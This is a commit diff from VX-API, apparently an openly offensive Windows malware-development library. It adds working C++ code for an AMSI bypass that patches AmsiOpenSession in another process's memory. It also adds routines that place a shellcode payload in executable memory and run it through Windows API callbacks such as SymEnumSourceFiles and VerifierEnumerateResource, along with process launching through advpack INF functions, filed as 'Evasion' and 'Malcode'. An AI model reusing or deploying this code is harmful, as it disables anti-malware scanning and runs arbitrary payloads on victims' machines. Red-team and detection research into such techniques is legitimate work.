Version: 2.0.658

Version: 2.0.658

README.md

@@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
   
 # VX-API
 
-Version: 2.0.642
+Version: 2.0.658
 
 Developer: smelly__vx
   
@@ -99,6 +99,10 @@ You're free to use this in any manner you please. You do not need to use this en
 | RemoveRegisterDllNotification | Rad98, Peter Winter-Smith | Evasion |
 | CreateProcessByWindowsRHotKey | smelly__vx | Evasion |
 | CreateProcessByWindowsRHotKeyEx | smelly__vx | Evasion |
+| AmsiBypassViaPatternScan | ZeroMemoryEx | Evasion |
+| CopyFileViaSetupCopyFile | smelly__vx | Evasion |
+| CreateProcessFromINFSectionInstallStringNoCab | smelly__vx | Evasion |
+| CreateProcessFromINFSetupCommand | smelly__vx | Evasion |
 | GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
 | GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
 | GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
@@ -204,6 +208,8 @@ You're free to use this in any manner you please. You do not need to use this en
 | MpfSceViaClusWorkerCreate | alfarom256, aahmad097, wra7h | Malcode |
 | MpfSceViaSymEnumProcesses | alfarom256, aahmad097, wra7h | Malcode |
 | MpfSceViaImageGetDigestStream | alfarom256, aahmad097, wra7h | Malcode |
+| MpfSceViaVerifierEnumerateResource | alfarom256, aahmad097, wra7h | Malcode |
+| MpfSceViaSymEnumSourceFiles | alfarom256, aahmad097, wra7h | Malcode |
 | MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
 | MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
 | MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |

VX-API/AmsiBypassViaPatternScan.cpp

@@ -0,0 +1,70 @@
+#include "Win32Helper.h"
+
+typedef HRESULT(WINAPI* AMSIOPENSESSION)(HAMSICONTEXT, HAMSISESSION*);
+
+BYTE AmsiPattern[] = { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33 };
+UCHAR AmsiPatch[] = { 0xeb };
+
+ULONGLONG UnusedSubroutineSearchAmsiPattern(PBYTE Address, DWORD Size, PBYTE Pattern, DWORD PatternSize)
+{
+	for (DWORD dwX = 0; dwX < 1024; dwX++)
+	{
+		if (Address[dwX] == Pattern[0])
+		{
+			DWORD dwOffset = 1;
+			while (dwOffset < PatternSize && dwX + dwOffset < Size && (Pattern[dwOffset] == '?' || Address[dwX + dwOffset] == Pattern[dwOffset]))
+			{
+				dwOffset++;
+			}
+
+			if (dwOffset == PatternSize)
+				return (dwX + 3);
+		}
+	}
+
+	return 0;
+}
+
+BOOL AmsiBypassViaPatternScan(DWORD ProcessId)
+{
+	HANDLE hProcess = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	AMSIOPENSESSION pfnAmsiOpenSession = NULL;
+	BYTE AmsiBuffer[1024] = { 0 };
+	ULONGLONG AmsiAddress = 0LL, PatchedAmsiAddress = 0LL;
+		
+	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
+	if (hProcess == NULL)
+		goto EXIT_ROUTINE;
+
+	hMod = LoadLibraryW(L"amsi.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	pfnAmsiOpenSession = (AMSIOPENSESSION)GetProcAddressA((DWORD64)hMod, "AmsiOpenSession");
+	if (!pfnAmsiOpenSession)
+		goto EXIT_ROUTINE;
+
+	if (!ReadProcessMemory(hProcess, pfnAmsiOpenSession, &AmsiBuffer, 1024, NULL))
+		goto EXIT_ROUTINE;
+
+	AmsiAddress = UnusedSubroutineSearchAmsiPattern(AmsiBuffer, sizeof(AmsiBuffer), AmsiPattern, sizeof(AmsiPattern));
+	if (AmsiAddress == 0)
+		goto EXIT_ROUTINE;
+
+	PatchedAmsiAddress = (ULONGLONG)pfnAmsiOpenSession;
+	PatchedAmsiAddress += AmsiAddress;
+
+	if (!WriteProcessMemory(hProcess, (LPVOID)PatchedAmsiAddress, AmsiPatch, 1, NULL))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hProcess)
+		CloseHandle(hProcess);
+
+	return bFlag;
+}

VX-API/CopyFileViaSetupCopyFile.cpp

@@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
+{
+	return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
+}
+
+BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
+{
+	WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };
+	WCHAR wDestination[MAX_PATH * sizeof(WCHAR)] = { 0 };
+
+	if (CharStringToWCharString(wSource, (PCHAR)Source, StringLengthA(Source) * sizeof(WCHAR)) == 0)
+		return FALSE;
+
+	if (CharStringToWCharString(wDestination, (PCHAR)Destination, StringLengthA(Destination) * sizeof(WCHAR)) == 0)
+		return FALSE;
+
+	return SetupDecompressOrCopyFileW(wSource, wDestination, FILE_COMPRESSION_NONE);
+}
+

VX-API/CreateProcessFromINFSectionInstallStringNoCab.cpp

@@ -0,0 +1,115 @@
+#include "Win32Helper.h"
+
+/*
+
+Example .inf file
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+[version]
+signature = $Chicago$
+AdvancedInf = 2.5
+
+[DefaultInstall_SingleUser]
+RunPostSetupCommands = Tag1
+
+[Tag1]
+C:\Windows\system32\calc.exe
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+*/
+
+BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
+{
+	typedef HRESULT(WINAPI* LAUNCHINFSECTIONW)(HWND, HINSTANCE, PWSTR, INT);
+	LAUNCHINFSECTIONW LaunchINFSectionW = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	WCHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
+
+	hMod = LoadLibraryW(L"advpack.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	LaunchINFSectionW = (LAUNCHINFSECTIONW)GetProcAddressA((DWORD64)hMod, "LaunchINFSectionW");
+	if (!LaunchINFSectionW)
+		goto EXIT_ROUTINE;
+
+	if (StringCopyW(InfExecutionBuffer, PathToInfFile) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L",") == NULL) 
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, NameOfSection) == NULL) 
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L",") == NULL) 
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L"1") == NULL) 
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L",") == NULL) 
+		goto EXIT_ROUTINE;
+
+	if (!SUCCEEDED(LaunchINFSectionW(NULL, NULL, InfExecutionBuffer, 0)))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}
+
+BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection)
+{
+	typedef HRESULT(WINAPI* LAUNCHINFSECTION)(HWND, HINSTANCE, PSTR, INT);
+	LAUNCHINFSECTION LaunchINFSection = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	CHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
+
+	hMod = LoadLibraryW(L"advpack.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	LaunchINFSection = (LAUNCHINFSECTION)GetProcAddressA((DWORD64)hMod, "LaunchINFSection");
+	if (!LaunchINFSection)
+		goto EXIT_ROUTINE;
+
+	if (StringCopyA(InfExecutionBuffer, PathToInfFile) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, NameOfSection) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, "1") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!SUCCEEDED(LaunchINFSection(NULL, NULL, InfExecutionBuffer, 0)))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}

VX-API/CreateProcessFromINFSetupCommand.cpp

@@ -0,0 +1,56 @@
+#include "Win32Helper.h"
+
+#define RSC_FLAG_INF 1
+#define RSC_FLAG_QUIET 4
+
+BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
+{
+	typedef HRESULT(WINAPI* RUNSETUPCOMMANDW)(HWND, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, PHANDLE, DWORD, LPVOID);
+	RUNSETUPCOMMANDW RunSetupCommandW = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = LoadLibraryW(L"advpack.dll");
+
+	RunSetupCommandW = (RUNSETUPCOMMANDW)GetProcAddressA((DWORD64)hMod, "RunSetupCommandW");
+	if (!RunSetupCommandW)
+		goto EXIT_ROUTINE;
+
+	if (!SUCCEEDED(RunSetupCommandW(NULL, PathToInfFile, NameOfSection, L".", NULL, NULL, RSC_FLAG_INF | RSC_FLAG_QUIET, NULL)))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}
+
+BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection)
+{
+	typedef HRESULT(WINAPI* RUNSETUPCOMMANDA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, PHANDLE, DWORD, LPVOID);
+	RUNSETUPCOMMANDA RunSetupCommandA = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = LoadLibraryW(L"advpack.dll");
+
+	RunSetupCommandA = (RUNSETUPCOMMANDA)GetProcAddressA((DWORD64)hMod, "RunSetupCommandA");
+	if (!RunSetupCommandA)
+		goto EXIT_ROUTINE;
+
+	if (!SUCCEEDED(RunSetupCommandA(NULL, PathToInfFile, NameOfSection, ".", NULL, NULL, RSC_FLAG_INF | RSC_FLAG_QUIET, NULL)))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}

VX-API/FunctionDeclaration.h

@@ -79,4 +79,11 @@ typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
 /*******************************************
  ADVAPI32 IMPORT
 *******************************************/
-typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
+typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
+
+
+
+///*******************************************
+// IMAGEHLP IMPORT
+//*******************************************/
+typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);

VX-API/Internal.h

@@ -65,6 +65,8 @@
 #define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
 #define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004
 
+#define CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO 0x04
+
 typedef struct _LSA_UNICODE_STRING {
 	USHORT Length;
 	USHORT MaximumLength;

VX-API/IsPeSection.cpp

@@ -32,7 +32,7 @@ BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName)
 	if (Buffer == NULL)
 		goto EXIT_ROUTINE;
 
-	if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
+	if (!ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
 		goto EXIT_ROUTINE;
 
 	if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
@@ -83,7 +83,7 @@ BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName)
 	if (Buffer == NULL)
 		goto EXIT_ROUTINE;
 
-	if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
+	if (!ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
 		goto EXIT_ROUTINE;
 
 	if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))

VX-API/Main.cpp

@@ -2,20 +2,14 @@
 
 INT main(VOID)
 {
-	/*
-	
-	This is stuff I was debugging.
-	------------------------------------
-	
 	DWORD dwSize = 0;
 	PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
 
-	MpfSceViaImageGetDigestStream((PBYTE)Buffer, dwSize);
+	//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
 	
-	------------------------------------
-	*/
-
+	//BOOL bFlag = AmsiBypassViaPatternScan(4288);
 	
+	CreateProcessFromINFSectionInstallStringNoCabA("C:\\Users\\dwThr\\Desktop\\demo.inf", "DefaultInstall_SingleUser");
 
 	return ERROR_SUCCESS;
 }

VX-API/MpfSceViaChooseColor.cpp

@@ -21,4 +21,6 @@ BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
 	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
 
 	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeChooseColorWCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
 }

VX-API/MpfSceViaImageGetDigestStream.cpp

@@ -7,12 +7,22 @@ VOID InvokeImageGetDigestStreamCallbackRoutine(LPVOID lpParameter)
 	WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\ntdll.dll";
 	HANDLE hImage = NULL;
 	HANDLE hDispose = NULL;
+	IMAGEGETDIGESTSTREAM ImageGetDigestStream = NULL;
+	HMODULE hMod = NULL;
+
+	hMod = LoadLibraryW(L"Imagehlp.dll");
+	if (hMod == NULL)
+		return;
+
+	ImageGetDigestStream = (IMAGEGETDIGESTSTREAM)GetProcAddressA((DWORD64)hMod, "ImageGetDigestStream");
+	if (!ImageGetDigestStream)
+		return;
 
 	hImage = CreateFileW(DefaultBinaryPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 	if (hImage == INVALID_HANDLE_VALUE)
 		return;
 
-	ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)lpParameter, &hDispose);
+	ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, lpParameter, &hDispose);
 		
 	if(hDispose)
 		CloseHandle(hDispose);

VX-API/MpfSceViaSymEnumSourceFiles.cpp

@@ -0,0 +1,26 @@
+#include "Win32Helper.h"
+
+VOID InvokeSymEnumSourceFilesCallbackRoutine(LPVOID lpParameter)
+{
+	if (!SymInitializeW(GetCurrentProcess(), NULL, TRUE))
+		return;
+
+	SymEnumSourceFilesW(GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
+
+	SymCleanup(GetCurrentProcess());
+}
+
+BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeSymEnumSourceFilesCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}

VX-API/MpfSceViaVerifierEnumerateResource.cpp

@@ -0,0 +1,37 @@
+#include "Win32Helper.h"
+
+
+VOID InvokeVerifierEnumerateResourceCallbackRoutine(LPVOID lpParameter)
+{
+	typedef ULONG(NTAPI* AVRF_RESOURCE_ENUMERATE_CALLBACK)(PVOID ResourceDescription, PVOID EnumerationContext, PULONG EnumerationLevel);
+	typedef ULONG(WINAPI* VERIFIERENUMERATERESOURCE)(HANDLE, ULONG, ULONG, AVRF_RESOURCE_ENUMERATE_CALLBACK, PVOID);
+	VERIFIERENUMERATERESOURCE VerifierEnumerateResource = NULL;
+	HMODULE hMod = NULL;
+
+	hMod = LoadLibraryW(L"verifier.dll");
+	if (hMod == NULL)
+		return;
+
+	VerifierEnumerateResource = (VERIFIERENUMERATERESOURCE)GetProcAddressA((DWORD64)hMod, "VerifierEnumerateResource");
+	if (!VerifierEnumerateResource)
+		return;
+
+	VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
+
+	return;
+}
+
+BOOL MpfSceViaVerifierEnumerateResource(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeVerifierEnumerateResourceCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}

VX-API/VX-API.vcxproj

@@ -135,6 +135,7 @@
     <ClCompile Include="AdfCloseHandleOnInvalidAddress.cpp" />
     <ClCompile Include="AdfIsCreateProcessDebugEventCodeSet.cpp" />
     <ClCompile Include="AdfOpenProcessOnCsrss.cpp" />
+    <ClCompile Include="AmsiBypassViaPatternScan.cpp" />
     <ClCompile Include="ByteArrayToCharArray.cpp" />
     <ClCompile Include="CaplockString.cpp" />
     <ClCompile Include="CharArrayToByteArray.cpp" />
@@ -144,6 +145,7 @@
     <ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp" />
     <ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp" />
     <ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp" />
+    <ClCompile Include="CopyFileViaSetupCopyFile.cpp" />
     <ClCompile Include="CopyMemoryEx.cpp" />
     <ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp" />
     <ClCompile Include="CreateLocalAppDataObjectPath.cpp" />
@@ -152,6 +154,8 @@
     <ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp" />
     <ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp" />
     <ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
+    <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
+    <ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
     <ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
     <ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
     <ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
@@ -303,6 +307,8 @@
     <ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
     <ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
     <ClCompile Include="MpfSceViaSymEnumProcesses.cpp" />
+    <ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp" />
+    <ClCompile Include="MpfSceViaVerifierEnumerateResource.cpp" />
     <ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
     <ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
     <ClCompile Include="ReadDataFromPeSection.cpp" />

VX-API/VX-API.vcxproj.filters

@@ -753,6 +753,24 @@
     <ClCompile Include="MpfSceViaImageGetDigestStream.cpp">
       <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
     </ClCompile>
+    <ClCompile Include="AmsiBypassViaPatternScan.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaVerifierEnumerateResource.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
+    </ClCompile>
+    <ClCompile Include="CopyFileViaSetupCopyFile.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="Internal.h">

VX-API/Win32Helper.h

@@ -3,8 +3,7 @@
 #include "StringManipulation.h"
 #include "FunctionDeclaration.h"
 #include <Ws2tcpip.h>
-#include <imagehlp.h>
-//#include <Dbghelp.h> 
+#include <Dbghelp.h> 
 #include <wincrypt.h>
 #include <shlwapi.h>
 #include <Shlobj.h>
@@ -21,14 +20,15 @@
 #include <dpa_dsa.h>
 #include <winevt.h>
 #include <resapi.h>
+#include <amsi.h>
+#include <SetupAPI.h>
 
 
 
 #pragma comment(lib, "Dnsapi.lib")
 #pragma comment(lib, "Iphlpapi.lib")
 #pragma comment(lib, "Crypt32.lib")
-#pragma comment(lib, "Imagehlp.lib")
-//#pragma comment(lib, "Dbghelp.lib")
+#pragma comment(lib, "Dbghelp.lib")
 #pragma comment(lib, "Wtsapi32.lib")
 #pragma comment(lib, "Urlmon.lib")
 #pragma comment(lib, "PowrProf.lib")
@@ -37,7 +37,7 @@
 #pragma comment(lib, "Comctl32.lib")
 #pragma comment(lib, "Wevtapi.lib")
 #pragma comment(lib, "ResUtils.lib")
-
+#pragma comment(lib, "Setupapi.lib")
 
 
 #ifndef NT_SUCCESS
@@ -322,6 +322,8 @@ BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
 BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
 BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
 BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaVerifierEnumerateResource(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
+BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
 
 
 
@@ -355,6 +357,13 @@ DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
 DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
 DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
 DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
+BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
+BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
+BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
+BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
+BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
+BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
+BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection);